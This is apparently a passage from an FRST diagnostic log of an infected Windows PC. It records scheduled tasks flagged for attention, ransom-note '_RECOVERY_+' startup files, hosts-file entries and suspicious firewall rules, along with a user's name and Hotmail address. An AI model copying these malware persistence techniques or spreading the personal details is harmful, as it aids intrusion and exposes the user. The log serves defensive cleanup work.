ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()
Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]
Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]
Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)
Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)
Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)
Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)
Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()
Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe
Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)
Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)
Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION
Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)
Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)
Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"
Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()
Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)
Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho
Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FrostWire 6\FrostWire 6.0.8-SafeMode.lnk -> C:\Program File (x86) Frostwire 6 - Torrent & Music Downloader\FrostWire 6\frostwire.bat ()

ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "

==================== Loaded Modules (Whitelisted) ==============

2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll
2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe
2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe
2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll
2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll
2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll
2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll
2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll
2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll
2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll
2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]
AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com
IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com
IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts

127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 mydownloaddomain.com
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 bcnmonetize.go2affise.com
127.0.0.1 beautifllink.xyz

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => "avgnt"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE
FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe
FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886
FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886
FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe
FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869
FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900
FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe
FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe
FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe
FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe
FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe
FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe
FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe
FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe
FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
